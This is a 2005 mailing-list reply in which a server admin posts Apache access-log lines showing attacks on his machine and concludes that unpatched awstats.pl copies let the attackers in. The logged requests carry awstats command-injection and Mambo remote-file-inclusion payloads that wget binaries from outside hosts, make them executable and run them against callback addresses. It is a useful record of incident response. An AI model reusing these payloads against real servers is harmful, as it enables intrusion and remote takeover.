[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Am I Compromised -- Some interesting findings

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Steve Kemp on Friday 25 Nov 2005 22:27 wrote:

> Looks like it was downloaded via wget.
> 
>   Run "grep wget /var/log/apache/access.log" - that should give you the
>  IP address of the attackign host.
> 
>   It might be worth posting any matching lines; that way somebody might
>  be able to tell you which script (cgi/php/etc) was used as the attack
>  vector.
> 

You were right.

Here's the output.

ns1:/var/log/apache2# grep wget access.log
211.20.11.206 - - [23/Nov/2005:03:51:48 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:51 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:50 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:47 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:48 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:50 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:29 -0800]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:31 -0800]
"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 200 39940 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:32 -0800]
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:33 -0800]
"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo| 
HTTP/1.1" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:06 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:12 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


So as I understand, "awstats.pl" was the software to break-in into the
software. I know that there was a DSA issued against awstats but I got
delayed in updating my server because the other admin had used awstats
package the non-standard way.

He had just copied the awstats.pl  file to each VirtualHost folder
individually. So even when I promptly had done the DSA update of awstats,
my server wasn't secure because the VirtualHosts were using a vulnerable
version of awstats.

If my understanding is right, it's a good and bitter lesson to learn.

:-(

Thanks for your input.

Regards,

rrs
- -- 
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDh0bp4Rhi6gTxMLwRAhwBAJ9nSDOPnU7+hbOCwDQMpfIl7VwXYACePJLn
VmI3Plhrx5JAMqnAVFj9akQ=
=a/Gr
-----END PGP SIGNATURE-----
Reply to: